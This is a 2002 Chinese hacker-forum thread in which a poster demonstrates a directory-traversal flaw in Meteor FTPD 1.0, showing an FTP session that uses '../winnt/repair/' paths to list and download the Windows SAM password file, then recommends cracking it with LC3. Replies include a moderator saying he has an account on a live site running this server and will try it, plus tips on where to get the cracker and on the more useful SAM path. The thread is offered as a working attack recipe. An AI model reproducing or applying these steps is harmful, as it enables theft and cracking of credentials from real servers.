[原创]Meteor FTPD 1.0漏洞利用实例

>> 欢迎您， 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助

首页

小榕软件实验室

刀光雪影

■ 回复数：9　◆ 点击数：336

将此页发给您的朋友

作者

主题: [原创]Meteor FTPD 1.0漏洞利用实例

回复 | 收藏 | 打印 | 篇末

雾中鸟

级别：老站友
威望：0
经验：0
货币：1513
体力：

来源：天涯海角
总发帖数：364
注册日期：2001-10-25

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

Meteor FTPD 1.0漏洞利用实例
作者：雾中鸟
Meteor FTPD 1.0是一款FTP服务器软件，存在一个漏洞就是能让在此FTP服务器上拥有帐户的普通用户可以稍稍变形就可以浏览各个目录，因此就产生了很大的危险，下面我就用一个例子来说明这一点：
ftp 192.168.0.1
Connected to 192.168.0.1
220 Service ready for new user
Utilisateur (192.168.160.1

none)) : japleak
331 User name okay, need password
Mot de passe :
230- Meteor FTP Version 1.0
230 User logged in, proceed
ftp> ls ../winnt/repair/*
200 Command OK
150 About to open data connection
.
..
setup.log
secsetup.inf
system
software
default
security
sam
ntuser.dat
autoexec.nt
config.nt
226 Closing data connection. Requested file action successful.
ftp : 110 octets re=E7us dans 0,02Secondes 5,50Ko/sec.
ftp> mget ../winnt/repair/sam
200 Command OK
150 About to open data connection
226 Closing data connection. Requested file action successful.
ftp : 20480 octets re=E7us dans 0,01Secondes 2048,00Ko/sec.
ftp>quit
看见了吧？只要有一定经验的朋友都应该知道怎么做了，就是用lc3破解sam了。当然这里还可以对上面的方法稍稍解释：
首先连接服务器192.168.0.1，由于你是这个服务器上的合法用户，用你的帐户和密码登陆，然后用ls命令列出%system%\repair\目录下的所有文件，这里我们就需要的是sam文件（储存nt帐户的密码文件）。然后用mget下载到本地，最后断开连接quit。
国外的一个很出名的黑客组织L0pht（http://www.l0pht.com/）推出的这个专门破解nt/2000中sam文件的lc3，可以在短短几个小时破解出60％的密码，只要有足够时间，还怕不能破解出来？

----------------------------------------------------------
我生命中最美好的时光，是在小榕论坛度过的！
喜欢编程的朋友请进来:[URL=http://www.sandflee.net/cgi-bin/lb5000/forums.cgi?forum=18]http://www.sandflee.net/cgi-bin/lb5000/forums.cgi?forum=18[/URL]

编辑　

删除　

发表于 2002-03-04.11:37:16　

IP: 已记录

永远的FLASH 帅哥哦

级别：刀光雪影版主
威望：3
经验：1
货币：5852
体力：

来源：江苏
总发帖数：2264
注册日期：2002-02-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

谢了
我最近正好找到一个用这个软件的网站
而且我也有了帐号
回去试试!

----------------------------------------------------------
H4技术组：http://www.h4h4.com

编辑　

删除　

发表于 2002-03-04.11:43:56　

IP: 已记录

雾中鸟

级别：老站友
威望：0
经验：0
货币：1513
体力：

来源：天涯海角
总发帖数：364
注册日期：2001-10-25

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

呵呵，祝你成功阿

编辑　

删除　

发表于 2002-03-04.11:55:22　

IP: 已记录

傲气雄鹰

级别：本论坛版主
威望：0
经验：9
货币：3325
体力：

来源：云南昆明
总发帖数：1558
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

不错！

----------------------------------------------------------
本论坛不欢迎如下类型的帖子，此类帖子会被关闭或删除，本人恕不回复。
一，刀光雪影完全无关
二，无内容或内容过于简单，标题无意义的
三，个人联系的帖子。和标题为“某某请进”之类的
四，要求代破密码的
五，同一帖子多次重复的，灌水的
六，政治敏感话题，语言不文明，攻击他人的
七，溯雪手册中已有详细介绍或前面帖子中已有大量回复的

编辑　

删除　

发表于 2002-03-04.12:54:44　

IP: 已记录

chinaalex 帅哥哦

级别：圣骑士
威望：0
经验：5
货币：347
体力：

来源：202.97.159.*
总发帖数：322
注册日期：2002-02-28

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

听你们说了很多次LC3,可以告诉我到底LC3是什么么?看你们的意思好象是一个破解密码的东东,在哪里能找到？

编辑　

删除　

发表于 2002-03-04.13:24:18　

IP: 已记录

libertine 帅哥哦

级别：开国大老
威望：0
经验：0
货币：1715
体力：

来源：192.168.0.1
总发帖数：2365
注册日期：2002-02-12

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

就是破SAM的东东咯,在哪下我也忘了

----------------------------------------------------------
http://www.adhacker.net/

编辑　

删除　

发表于 2002-03-04.13:25:53　

IP: 已记录

永远的FLASH 帅哥哦

级别：刀光雪影版主
威望：3
经验：1
货币：5852
体力：

来源：江苏
总发帖数：2264
注册日期：2002-02-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

WWW.SANDFLEE.NET

----------------------------------------------------------
H4技术组：http://www.h4h4.com

编辑　

删除　

发表于 2002-03-04.13:31:07　

IP: 已记录

刺

级别：长老级
威望：1
经验：0
货币：1693
体力：

来源：211.90.123.*
总发帖数：930
注册日期：2002-01-19

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

顶

----------------------------------------------------------
你们到底他妈的有什么不爽的？

编辑　

删除　

发表于 2002-03-04.13:58:06　

IP: 已记录

sandflee 帅哥哦

级别：长老级
威望：0
经验：0
货币：38
体力：

来源：黑暗地狱
总发帖数：655
注册日期：2002-01-27

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

这个sam文件的作用<0.01%
有用的SAM在winnt\system32\config\SAM

----------------------------------------------------------
http://www.isgrey.com/

编辑　

删除　

发表于 2002-03-04.14:03:27　

IP: 已记录

123123 帅哥哦

级别：中级站友
威望：0
经验：0
货币：
体力：

来源：你妈操我
总发帖数：90
注册日期：2002-02-07

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

sam是暴力破，还不如直接暴力猜解NT口令,省的那么麻烦

编辑　

删除　

发表于 2002-03-04.15:20:45　

IP: 已记录

选择回复

快速回复主题：	>>>高级模式
	用户名：没有注册？　密码：忘记密码？
记住密码 HTML语法禁止IDB代码禁止表情字符	[按 Ctrl+Enter 快捷键可直接提交帖子]
投票评分：	共 0 票

所有时间均为: 北京时间

↑TOP